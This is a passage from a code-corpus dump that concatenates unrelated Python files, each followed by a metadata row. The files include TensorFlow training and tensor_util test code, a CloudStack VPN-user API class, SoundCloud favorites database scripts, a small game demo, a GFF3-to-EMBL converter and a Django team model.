trainable_params = [v
for k, v in self.params.iteritems()
if k in self._only_train]
else:
trainable_params = self.params.values()
lr = self._AddLearningRate(learning_rate, decay_steps)
optimizer = tf.train.MomentumOptimizer(lr,
momentum,
use_locking=self._use_locking)
train_op = optimizer.minimize(nodes['cost'], var_list=trainable_params)
for param in trainable_params:
slot = optimizer.get_slot(param, 'momentum')
self.inits[slot.name] = state_ops.init_variable(slot,
tf.zeros_initializer)
self.variables[slot.name] = slot
numerical_checks = [
tf.check_numerics(param,
message='Parameter is not finite.')
for param in trainable_params
if param.dtype.base_dtype in [tf.float32, tf.float64]
]
check_op = tf.group(*numerical_checks)
avg_update_op = tf.group(*self._averaging.values())
train_ops = [train_op]
if self._check_parameters:
train_ops.append(check_op)
if self._use_averaging:
train_ops.append(avg_update_op)
nodes['train_op'] = tf.group(*train_ops, name='train_op')
return nodes
def AddSaver(self, slim_model=False):
"""Adds ops to save and restore model parameters.
Args:
slim_model: whether only averaged variables are saved.
Returns:
the saver object.
"""
# We have to put the save op in the root scope otherwise running
# "save/restore_all" won't find the "save/Const" node it expects.
with tf.name_scope(None):
variables_to_save = self.params.copy()
variables_to_save.update(self.variables)
if slim_model:
for key in variables_to_save.keys():
if not key.endswith('avg_var'):
del variables_to_save[key]
self.saver = tf.train.Saver(variables_to_save)
return self.saver
| apache-2.0 | -1,037,172,848,354,709,400 | 41.096491 | 80 | 0.612086 | false |
MissionCriticalCloud/marvin | marvin/cloudstackAPI/addVpnUser.py | 1 | 2003 | """Adds vpn users"""
from baseCmd import *
from baseResponse import *
class addVpnUserCmd (baseCmd):
typeInfo = {}
def __init__(self):
self.isAsync = "true"
"""password for the username"""
"""Required"""
self.password = None
self.typeInfo['password'] = 'string'
"""username for the vpn user"""
"""Required"""
self.username = None
self.typeInfo['username'] = 'string'
"""an optional account for the vpn user. Must be used with domainId."""
self.account = None
self.typeInfo['account'] = 'string'
"""an optional domainId for the vpn user. If the account parameter is used, domainId must also be used."""
self.domainid = None
self.typeInfo['domainid'] = 'uuid'
"""add vpn user to the specific project"""
self.projectid = None
self.typeInfo['projectid'] = 'uuid'
self.required = ["password", "username", ]
class addVpnUserResponse (baseResponse):
typeInfo = {}
def __init__(self):
"""the vpn userID"""
self.id = None
self.typeInfo['id'] = 'string'
"""the account of the remote access vpn"""
self.account = None
self.typeInfo['account'] = 'string'
"""the domain name of the account of the remote access vpn"""
self.domain = None
self.typeInfo['domain'] = 'string'
"""the domain id of the account of the remote access vpn"""
self.domainid = None
self.typeInfo['domainid'] = 'string'
"""the project name of the vpn"""
self.project = None
self.typeInfo['project'] = 'string'
"""the project id of the vpn"""
self.projectid = None
self.typeInfo['projectid'] = 'string'
"""the state of the Vpn User"""
self.state = None
self.typeInfo['state'] = 'string'
"""the username of the vpn user"""
self.username = None
self.typeInfo['username'] = 'string'
| apache-2.0 | 2,789,623,737,036,903,000 | 32.949153 | 114 | 0.572142 | false |
pekzeki/SoundcloudNetwork | favorite_information.py | 1 | 1765 | # import MySQLdb
def getPlaylistInformation(client, user_id, favoritesCount):
favoritesList = list()
favorite_url = '/users/' + str(user_id) + '/favorites'
for i in range(0, favoritesCount, 50):
favorites = client.get(favorite_url, offset=i)
favoritesList.append(favorites)
return favoritesList
def insertDB(user_id, favoritesList):
database = MySQLdb.connect(host="127.0.0.1", user = "root", passwd="", db = "soundcloud")
database.set_character_set('utf8')
cursor = database.cursor()
for favorites in favoritesList:
for favorite in favorites:
query = "INSERT INTO T_FAVORITEINFO (TRACKID, FAVUSERID) VALUES (%s, %s)"
TRACKID = favorite.id
FAVUSERID = favorite.user_id
values = (TRACKID, FAVUSERID)
cursor.execute(query, values)
query = "INSERT INTO T_ACTIVITY (USERID, ACTIVITYTYPE, FAVORITEID) VALUES (%s, %s, %s)"
USERID = user_id
ACTIVITYTYPE = "12"
FAVORITEID = cursor.lastrowid
values = (USERID, ACTIVITYTYPE, FAVORITEID)
cursor.execute(query, values)
cursor.close()
database.commit()
database.close()
from py2neo import Graph
def add2Neo4J(user_id, favoritesList):
graph = Graph()
tx = graph.cypher.begin()
for favorites in favoritesList:
for favorite in favorites:
tx.append("MATCH (u1:User), (t1:Track) WHERE u1.id = {A} AND t1.id = {B} CREATE UNIQUE (t1)-[:FAVORITED_BY]->(u1)",
{"A":user_id, "B":favorite.id})
tx.process()
tx.commit()
| mit | 3,434,409,342,504,076,300 | 29.431034 | 128 | 0.561473 | false |
lamestation/LEAM | games/maps/03_ParallaxScrolling.py | 1 | 1111 | #/usr/bin/env python
from lame import gfx
from lame import map
from lame import ctrl
def main():
xoffset = 0
offsetw = 0
w1 = 0
dx = 0
map.start(gfx.start())
gfx.limit(gfx.FULLSPEED)
cavelake = gfx.load('gfx/cavelake.png')
cave = map.load('gfx/cave.tmx')
cave2 = map.load('gfx/cave2.tmx')
w1 = map.width(cave) * 8 - 128
h1 = map.height(cave) * 8 - 64
w2 = map.width(cave2) * 8 - 128
h2 = map.height(cave2) * 8 - 64
dx = w1 // w2
dy = h1 // h2
yoffset = 64
while True:
ctrl.update()
if ctrl.left():
if xoffset > 0:
xoffset -= 2
if ctrl.right():
if xoffset < w1:
xoffset += 2
if ctrl.up():
if yoffset > 0:
yoffset -= 2
if ctrl.down():
if yoffset < h1:
yoffset += 2
gfx.blit(cavelake)
gfx.invertcolor(True)
map.draw(cave2, xoffset // dx, yoffset // dy)
gfx.invertcolor(False)
map.draw(cave, xoffset, yoffset)
gfx.draw()
main()
| gpl-3.0 | -1,402,535,558,148,705,500 | 22.638298 | 53 | 0.49505 | false |
sanger-pathogens/gff3toembl | gff3toembl/EMBLContig.py | 1 | 19185 | import re
from textwrap import TextWrapper
from six.moves.urllib.parse import unquote as gff3_unescape
class EMBLContig(object):
def __init__(self):
self.header = None
self.features = {}
self.sequence = None
def format(self):
try:
header = self.header.format()
except AttributeError:
raise ValueError("Could not format contig, no header data found")
feature_strings = [feature.format() for feature in self.sorted_features()]
features = "".join(feature_strings)
try:
sequence = self.sequence.format()
except AttributeError:
raise ValueError("Could not format contig, no sequence data found")
formatted_string = header + features + sequence
header_features_formatted_string = header + features
line_lengths = map(len, header_features_formatted_string.split('\n'))
maximum_line_length = max(line_lengths)
if maximum_line_length > 80:
raise ValueError("Could not format contig, a line exceeded 80 characters in length")
return formatted_string
def add_header(self, **kwargs):
if self.header != None:
raise ValueError("Contig already has header data")
header = EMBLHeader(**kwargs)
self.header = header
def add_feature(self, sequence_id, **kwargs):
feature = EMBLFeature(**kwargs)
unique_feature_reference = "{}_{}_{}_{}".format(sequence_id, feature.feature_type, feature.start, feature.end)
if unique_feature_reference in self.features:
# we're already seen a feature in this region so don't add another
return False
elif feature.format() == None:
# some feature types should be ignored; format() returns None in these cases
return False
else:
self.features[unique_feature_reference] = feature
return True
def add_sequence(self, sequence_string):
if self.sequence != None:
raise ValueError("Contig already has sequence data")
sequence = EMBLSequence(sequence_string)
self.sequence = sequence
def sorted_features(self):
# Features should be sorted by start and then by end irrespective of strand
def sort_key(feature):
return (feature.start, feature.end)
return sorted(self.features.values(), key=sort_key)
class EMBLFeature(object):
inference_to_db_xref_map = {
'similar to AA sequence:UniProtKB': 'UniProtKB/Swiss-Prot',
'protein motif:Pfam': 'PFAM',
'protein motif:CLUSTERS': "CDD",
'protein motif:Cdd': "CDD",
'protein motif:TIGRFAMs': "TIGRFAM"
}
def __init__(self, feature_type, start, end, strand, feature_attributes,
locus_tag=None, translation_table=11):
# Picks a feature builder and builds the feature
# Most features are built with a default but some are either a little different or
# should just be ignored
feature_builder = self.pick_feature_builder(feature_type)
feature_builder(feature_type=feature_type, start=start, end=end, strand=strand,
feature_attributes=feature_attributes, locus_tag=locus_tag,
translation_table=translation_table)
def pick_feature_builder(self, feature_type):
feature_builders = {
'CDS': self.create_CDS_feature,
'source': self.create_source_feature,
'ncRNA': self.create_empty_feature
}
return feature_builders.get(feature_type, self.create_default_feature)
def create_default_feature(self, feature_type, start, end, strand, feature_attributes, locus_tag, translation_table):
self.feature_type = feature_type
self.start = start
self.end = end
self.strand = strand
self.locus_tag = locus_tag
self.translation_table = translation_table
self.attributes = []
for attribute_key, attribute_value in feature_attributes.items():
attribute_creator = self.lookup_attribute_creator(attribute_key)
new_attributes = attribute_creator(attribute_key, attribute_value)
self.attributes += new_attributes
def create_CDS_feature(self, **kwargs):
self.create_default_feature(**kwargs)
self.attributes += self.create_translation_table_attributes('transl_table', self.translation_table)
def create_source_feature(self, feature_type, start, end, strand, feature_attributes, locus_tag, translation_table):
self.feature_type = feature_type
self.start = start
self.end = end
self.strand = strand
self.locus_tag = locus_tag
self.translation_table = translation_table
organism = feature_attributes['organism']
db_xref = feature_attributes['db_xref']
note = feature_attributes['note']
# We hard code the order and composition of attributes for source features
# Source features are only created as part of the header
self.attributes = [("organism", organism), ("mol_type", "genomic DNA"), ("db_xref", db_xref), ("note", note)]
def create_empty_feature(self, **kwargs):
# Some features should be ignored. This is how this is done
self.format = lambda: None
def format(self):
coordinates = self.format_coordinates(self.start, self.end, self.strand)
header_string = "FT {feature_type: <16}{coordinates}".format( feature_type=self.feature_type,
coordinates=coordinates)
attribute_strings = [header_string]
for attribute_key,attribute_value in self.attributes:
attribute_strings.append(self.format_attribute(attribute_key, attribute_value))
return '\n'.join(attribute_strings) + '\n'
def format_attribute(self, key, value):
# Looks up a formatter for an attribute and formats the attribute
# Some attributes are formatted a little differently
# Also un-escapes the GFF3 mandated percent encoding here
formatter = self.lookup_attribute_formatter(key)
return formatter(key, gff3_unescape(str(value)))
def lookup_attribute_formatter(self, attribute_type):
formatters = {
'transl_table': self.number_attribute_formatter,
'product': self.product_attribute_formatter,
'codon_start': self.number_attribute_formatter,
}
return formatters.get(attribute_type, self.default_attribute_formatter)
def number_attribute_formatter(self, key, value):
# transl_table attributes do not have their values in quotes
wrapper = TextWrapper()
wrapper.initial_indent='FT '
wrapper.subsequent_indent='FT '
wrapper.width=80 # can use 80 characters plus the new line
attribute_text_template='/{attribute_key}={attribute_value}'
attribute_text=attribute_text_template.format(attribute_key=key, attribute_value=value)
return wrapper.fill(attribute_text)
def product_attribute_formatter(self, key, value):
# Products can include very long enzyme names which we don't want to break
wrapper = TextWrapper()
wrapper.initial_indent='FT '
wrapper.subsequent_indent='FT '
wrapper.width=80 # can use 80 characters plus the new line
wrapper.break_on_hyphens=True
attribute_text_template='/{attribute_key}="{attribute_value}"'
attribute_text=attribute_text_template.format(attribute_key=key, attribute_value=value)
return wrapper.fill(attribute_text)
def default_attribute_formatter(self, key, value):
wrapper = TextWrapper()
wrapper.initial_indent='FT '
wrapper.subsequent_indent='FT '
wrapper.width=80 # can use 80 characters plus the new line
attribute_text_template='/{attribute_key}="{attribute_value}"'
attribute_text=attribute_text_template.format(attribute_key=key, attribute_value=value)
return wrapper.fill(attribute_text)
def format_coordinates(self, start, end, strand):
if strand == '-':
return "complement({start}..{end})".format(start=start, end=end)
else:
return "{start}..{end}".format(start=start, end=end)
def lookup_attribute_creator(self, attribute_key):
# These functions take attributes and reformat them into a list
# of (key, values) which are later formatted into strings by other
# methods. There is quite a lot of variation between these such as
# whether to keep more than one value for a given attribute type.
attribute_creator_table = {
'product': self.create_product_attributes,
'locus_tag': self.create_locus_tag_attributes,
'eC_number': self.create_EC_number_attributes,
'inference': self.create_inference_attributes,
'protein_id': self.ignore_attributes,
'ID': self.ignore_attributes,
'codon_start': self.create_number_attributes,
'colour': self.ignore_attributes
}
return attribute_creator_table.get(attribute_key, self.create_default_attributes)
def create_number_attributes(self, attribute_key, attribute_value):
def strip_quotes(value):
return value.strip('"')
def remove_empty_strings(value):
return value != ''
attribute_values = attribute_value.split(',')
attribute_values = map(strip_quotes, attribute_values)
attribute_values = list(filter(remove_empty_strings, attribute_values))
if len(attribute_values) > 0:
first_attribute_value = attribute_values[0]
else:
return []
try:
first_attribute_value = int(first_attribute_value)
except TypeError:
first_attribute_value = 0
return [(attribute_key, first_attribute_value)]
def create_default_attributes(self, attribute_key, attribute_value):
def strip_quotes(value):
return value.strip('"')
def remove_empty_strings(value):
return value != ''
attribute_values = attribute_value.split(',')
attribute_values = map(strip_quotes, attribute_values)
attribute_values = list(filter(remove_empty_strings, attribute_values))
if len(attribute_values) > 0:
first_attribute_value = attribute_values[0]
else:
return []
return [(attribute_key, first_attribute_value)]
def create_product_attributes(self, attribute_key, attribute_value):
def remove_hypotheticals(value):
return 'hypothetical protein' not in value.lower()
def replace_unknown_with_uncharacterised(value):
return value.replace("nknown","ncharacterised")
def strip_quotes(value):
return value.strip('"')
def remove_empty_strings(value):
return value != ''
# attribute_value may be a comma deliminated list of values
# only some of which might be valid
attribute_values = attribute_value.split(',')
attribute_values = map(strip_quotes, attribute_values)
attribute_values = filter(remove_hypotheticals, attribute_values)
attribute_values = map(replace_unknown_with_uncharacterised, attribute_values)
attribute_values = list(filter(remove_empty_strings, attribute_values))
chosen_value = attribute_values[0] if len(attribute_values) > 0 else 'Uncharacterised protein'
return [('product', chosen_value)]
def create_locus_tag_attributes(self, attribute_key, attribute_value):
if self.locus_tag == None:
return [('locus_tag', attribute_value.strip('"'))]
else:
attribute_value_suffix = attribute_value.split('_')[-1]
return [('locus_tag', "{}_{}".format(self.locus_tag, attribute_value_suffix.strip('"')))]
def create_EC_number_attributes(self, attribute_key, attribute_value):
attribute_values = attribute_value.split(',')
def deduplicate_values(values):
return list(set(values))
def strip_quotes(value):
return value.strip('"')
attribute_values = deduplicate_values(attribute_values)
attribute_values = map(strip_quotes, attribute_values)
def remove_invalidnumber(value):
return re.match("^[\d]+\.[\d-]+\.[\d-]+\.[\d-]+$", value)
attribute_values = filter(remove_invalidnumber, attribute_values)
return [('EC_number', value) for value in attribute_values]
def create_inference_attributes(self, attribute_key, attribute_value):
def strip_quotes(value):
return value.strip('"')
attribute_values = attribute_value.split(',')
attribute_values = map(strip_quotes, attribute_values)
attributes = []
for value in attribute_values:
if self.should_convert_to_db_xref(value):
attributes.append(('db_xref', self.convert_to_db_xref(value)))
else:
attributes.append(('inference', value))
return attributes
def ignore_attributes(self, attribute_key, attribute_value):
return []
def should_convert_to_db_xref(self, attribute_value):
for search_text in self.inference_to_db_xref_map:
if search_text in attribute_value:
return True
return False
def convert_to_db_xref(self, attribute_value):
for search_text, replacement_text in self.inference_to_db_xref_map.items():
if search_text in attribute_value:
return attribute_value.replace(search_text, replacement_text)
raise ValueError("Failed to convert inference attribute '%s' to db_xref" % attribute_value)
def create_translation_table_attributes(self, attribute_key, attribute_value):
return [('transl_table', attribute_value)]
class EMBLHeader(object):
def __init__(self,
authors="Pathogen Genomics",
classification="UNC",
genome_type="circular",
organism=None,
project="",
publication="Unpublished",
sequence_identifier="",
sequence_length="",
sequence_name=None,
taxon_id=None,
title="Draft assembly annotated with Prokka",
):
self.authors=authors
self.classification=classification
self.genome_type=genome_type
self.organism=organism
self.project=project
self.publication=publication
self.sequence_identifier=self.remove_non_word_characters(sequence_identifier)
self.sequence_length=sequence_length
self.sequence_name=sequence_name
self.taxon_id=taxon_id
self.title=title
source_attributes = self.build_source_attributes(organism, taxon_id, sequence_name)
self.source_feature = EMBLFeature(feature_type='source', start=1, end=sequence_length,
strand='+', feature_attributes=source_attributes)
self.header_template = """\
ID XXX; XXX; {genome_type}; genomic DNA; STD; {classification}; {sequence_length} BP.
XX
AC XXX;
XX
AC * _{sequence_identifier}
XX
{project_line}
XX
DE XXX;
XX
RN [1]
{publication_authors}
{publication_title}
{publication_name}
XX
FH Key Location/Qualifiers
FH
"""
def header_attribute_formatter(self, key, header_text, quote_character, final_character):
wrapper = TextWrapper()
wrapper.initial_indent=key + ' '
wrapper.subsequent_indent=key + ' '
wrapper.width=80 # can use 80 characters plus the new line
attribute_text_template='{attribute_quote_character}{attribute_header_text}{attribute_quote_character}{attribute_final_character}'
attribute_text=attribute_text_template.format(attribute_header_text = header_text,
attribute_quote_character = quote_character,
attribute_final_character = final_character)
return wrapper.fill(attribute_text)
def remove_non_word_characters(self, sequence_identifier):
return re.sub(r'\W+', '', sequence_identifier)
def format(self):
project_line = self.header_attribute_formatter("PR", "Project:" + self.project, '', ';' )
publication_authors = self.header_attribute_formatter("RA", self.authors,'',';' )
publication_title = self.header_attribute_formatter("RT", self.title,'"',';' )
publication_name = self.header_attribute_formatter("RL", self.publication,'','.' )
return self.header_template.format(project_line = project_line,
publication_authors = publication_authors,
publication_title = publication_title,
publication_name = publication_name, **self.__dict__) + self.source_feature.format()
def build_source_attributes(self, organism, taxon_id, sequence_name):
def empty_string_if_none(value):
return value if value else ''
organism = empty_string_if_none(organism)
taxon_id = empty_string_if_none(taxon_id)
sequence_name = empty_string_if_none(sequence_name)
return {"organism": organism, "db_xref": "taxon:{}".format(taxon_id), "note": sequence_name}
class EMBLSequence(object):
def __init__(self, sequence_string):
nucleotide_counts = self.calculate_nucleotide_counts(sequence_string)
self.header = self.format_header(nucleotide_counts)
self.body = self.format_sequence_body(sequence_string)
self.length = len(sequence_string)
def format(self):
return self.header + '\n' + self.body
def calculate_nucleotide_counts(self, sequence):
sequence = sequence.lower()
counts = {}
counts['a'] = sequence.count('a')
counts['c'] = sequence.count('c')
counts['g'] = sequence.count('g')
counts['t'] = sequence.count('t')
count_of_acgt = sum(counts.values())
counts['other'] = len(sequence) - count_of_acgt
return counts
def format_header(self, nucleotide_counts):
# The SQ line can exceed 80 characters
template = "XX\nSQ Sequence {total} BP; {a} A; {c} C; {g} G; {t} T; {other} other;"
total_counts = sum(nucleotide_counts.values())
nucleotide_counts['total'] = total_counts
return template.format(**nucleotide_counts)
def format_sequence_body(self, sequence_string):
sequence_string = sequence_string.lower()
lines = self.split_sequence(sequence_string)
def format_a_line(line):
# a line looks like:
# (["1234567890", "12345", '', '', '', ''], 15)
# and should look like
# " 1234567890 12345 15"
blocks_of_sequence, end_of_line = line
format_arguments = blocks_of_sequence + [end_of_line]
return " {:<10} {:<10} {:<10} {:<10} {:<10} {:<10} {:>9}".format(*format_arguments)
formatted_lines = map(format_a_line, lines)
return '\n'.join(formatted_lines) + '\n'
def split_line_of_sequence(self, line_of_sequence):
# Turns "123456789012345" into ["1234567890", "12345", '', '', '', '']
splits = []
line_breaks = range(0, 60, 10)
for line_break in line_breaks:
split = line_of_sequence[line_break:line_break+10]
splits.append(split)
return splits
def split_sequence(self, sequence_string):
splits = []
sequence_length = len(sequence_string)
for start_of_line in range(0, sequence_length, 60):
# might not actually be the end of the line if the line isn't long enough
end_of_line = start_of_line + 60
line_of_sequence = sequence_string[start_of_line:end_of_line]
length_of_line = len(line_of_sequence)
end_of_line = start_of_line + length_of_line # actually end of the line
splits.append((self.split_line_of_sequence(line_of_sequence), end_of_line))
return splits
| gpl-3.0 | 967,759,466,079,958,900 | 41.44469 | 134 | 0.666927 | false |
vsoch/docfish | docfish/apps/users/models.py | 1 | 7665 | '''
Copyright (c) 2017 Vanessa Sochat
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from django.conf import settings
from django.contrib.auth import get_user_model
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField
from django.core.urlresolvers import reverse
from django.db import models
from docfish.settings import MEDIA_ROOT
from itertools import chain
import collections
import operator
import os
#######################################################################################################
# Supporting Functions and Variables ##################################################################
#######################################################################################################
# Create a token for the user when the user is created (with oAuth2)
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
# Get path to where images are stored for teams
def get_image_path(instance, filename):
team_folder = os.path.join(MEDIA_ROOT,'teams')
if not os.path.exists(team_folder):
os.mkdir(team_folder)
return os.path.join('teams', filename)
TEAM_TYPES = (('invite', 'Invite only. The user must be invited by the team administrator.'),
('institution', 'Institution only. Any user with the same institution as the creator can join'),
('open','Open. Anyone can join the team without asking.'))
REQUEST_CHOICES = (("denied", 'Request has not been granted.'),
("pending", 'Request is pending.'),
("granted", 'Request has been granted'),)
#######################################################################################################
# Teams ###############################################################################################
#######################################################################################################
class Team(models.Model):
'''A user team is a group of individuals that are annotating reports together. They can be reports across collections, or
institutions, however each user is only allowed to join one team.
'''
name = models.CharField(max_length=250, null=False, blank=False,verbose_name="Team Name")
owner = models.ForeignKey(User, blank=True, verbose_name="Team owner and adminstrator.")
created_at = models.DateTimeField('date of creation', auto_now_add=True)
updated_at = models.DateTimeField('date of last update', auto_now=True)
collection_ids = JSONField(default=[])
team_image = models.ImageField(upload_to=get_image_path, blank=True, null=True)
metrics_updated_at = models.DateTimeField('date of last calculation of rank and annotations',blank=True,null=True)
ranking = models.PositiveIntegerField(blank=True,null=True,
verbose_name="team ranking based on total number of annotations, calculated once daily.")
annotation_count = models.IntegerField(blank=False,null=False,
verbose_name="team annotation count, calculated once daily.",
default=0)
permission = models.CharField(choices=TEAM_TYPES,
default='open',
max_length=100,
verbose_name="Permission level for joining the team.")
members = models.ManyToManyField(User,
related_name="team_members",
related_query_name="team_members", blank=True,
help_text="Members of the team. By default, creator is made member.")
# would more ideally be implemented with User model, but this will work
# we will constrain each user to joining one team on view side
def collections(self):
from docfish.apps.main.models import Collection
return Collection.objects.filter(id__in=self.collection_ids)
def __str__(self):
return "%s:%s" %(self.id,self.name)
def __unicode__(self):
return "%s:%s" %(self.id,self.name)
def get_absolute_url(self):
return reverse('team_details', args=[str(self.id)])
def contender_collections(self):
from docfish.apps.main.models import Collection
owner_collections = Collection.objects.filter(owner=self.owner)
public_collections = Collection.objects.exclude(owner=self.owner,private=False)
return list(chain(owner_collections,public_collections))
def add_collection(self,cid):
if cid not in self.collection_ids:
self.collection_ids.append(cid)
def remove_collection(self,cid):
self.collection_ids = [x for x in self.collection_ids if x != cid]
self.save()
def has_collections(self):
if len(self.collection_ids) > 0:
return True
return False
def get_label(self):
return "users"
class Meta:
app_label = 'users'
class MembershipInvite(models.Model):
'''An invitation to join a team.
'''
code = models.CharField(max_length=200, null=False, blank=False)
team = models.ForeignKey(Team)
def __str__(self):
return "<%s:%s>" %(self.id,self.team.name)
def __unicode__(self):
return "<%s:%s>" %(self.id,self.team.name)
def get_label(self):
return "users"
class Meta:
app_label = 'users'
unique_together = (("code", "team"),)
class MembershipRequest(models.Model):
'''A request for membership is tied to a team.
A user is granted access if the owner grants him/her permission.
'''
user = models.ForeignKey(User)
team = models.ForeignKey(Team)
created_at = models.DateTimeField('date of request', auto_now_add=True)
status = models.CharField(max_length=200, null=False,
verbose_name="Status of request",
default="pending",choices=REQUEST_CHOICES)
def __str__(self):
return "<%s:%s>" %(self.user,self.team.name)
def __unicode__(self):
return "<%s:%s>" %(self.user,self.team.name)
def get_label(self):
return "users"
class Meta:
app_label = 'users'
unique_together = (("user", "team"),)
| mit | -7,754,442,776,888,561,000 | 40.209677 | 131 | 0.604436 | false |
zasdfgbnm/tensorflow | tensorflow/python/framework/tensor_util_test.py | 1 | 37338 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for tensor_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class TensorUtilTest(test.TestCase):
def testFloat(self):
value = 10.0
t = tensor_util.make_tensor_proto(value)
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape {}
float_val: %.1f
""" % value, t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array(value, dtype=np.float32), a)
def testFloatN(self):
t = tensor_util.make_tensor_proto([10.0, 20.0, 30.0])
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([10.0, 20.0, 30.0], dtype=np.float32), a)
def testFloatTyped(self):
t = tensor_util.make_tensor_proto([10.0, 20.0, 30.0], dtype=dtypes.float32)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([10.0, 20.0, 30.0], dtype=np.float32), a)
def testFloatTypeCoerce(self):
t = tensor_util.make_tensor_proto([10, 20, 30], dtype=dtypes.float32)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([10.0, 20.0, 30.0], dtype=np.float32), a)
def testFloatTypeCoerceNdarray(self):
arr = np.asarray([10, 20, 30], dtype="int")
t = tensor_util.make_tensor_proto(arr, dtype=dtypes.float32)
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([10.0, 20.0, 30.0], dtype=np.float32), a)
def testFloatSizes(self):
t = tensor_util.make_tensor_proto([10.0, 20.0, 30.0], shape=[1, 3])
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([[10.0, 20.0, 30.0]], dtype=np.float32), a)
def testFloatSizes2(self):
t = tensor_util.make_tensor_proto([10.0, 20.0, 30.0], shape=[3, 1])
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } dim { size: 1 } }
tensor_content: "A \000\000A\240\000\000A\360\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 3 } dim { size: 1 } }
tensor_content: "\000\000 A\000\000\240A\000\000\360A"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float32, a.dtype)
self.assertAllClose(np.array([[10.0], [20.0], [30.0]], dtype=np.float32), a)
def testFloatSizesLessValues(self):
t = tensor_util.make_tensor_proto(10.0, shape=[1, 3])
self.assertProtoEquals("""
dtype: DT_FLOAT
tensor_shape { dim { size: 1 } dim { size: 3 } }
float_val: 10.0
""", t)
# No conversion to Ndarray for this one: not enough values.
def testFloatNpArrayFloat64(self):
t = tensor_util.make_tensor_proto(
np.array([[10.0, 20.0, 30.0]], dtype=np.float64))
if sys.byteorder == "big":
self.assertProtoEquals("""
dtype: DT_DOUBLE
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "@$\000\000\000\000\000\000@4\000\000\000\000\000\000@>\000\000\000\000\000\000"
""", t)
else:
self.assertProtoEquals("""
dtype: DT_DOUBLE
tensor_shape { dim { size: 1 } dim { size: 3 } }
tensor_content: "\000\000\000\000\000\000$@\000\000\000\000\000\0004@\000\000\000\000\000\000>@"
""", t)
a = tensor_util.MakeNdarray(t)
self.assertEquals(np.float64, a.dtype)
